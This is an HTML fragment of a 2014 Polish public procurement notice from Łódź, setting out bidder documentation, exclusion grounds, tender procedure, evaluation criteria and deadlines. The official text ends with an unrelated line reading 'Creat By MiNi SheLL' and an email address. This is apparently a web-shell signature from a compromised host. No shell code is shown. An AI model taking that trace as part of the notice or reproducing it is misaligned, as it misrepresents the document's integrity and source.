<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Cena - 5</li>
<li>3 - Stawka roboczogodziny - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lodzkie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódź, ul. Piotrkowska 104, bud. E, I piętro, pokój 130-131.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2014 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, sekretariat Wydziału Administracyjno-Gospodarczego, ul. Piotrkowska 104, 90 - 926 Łódź, bud. E, I p., pok. 118..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com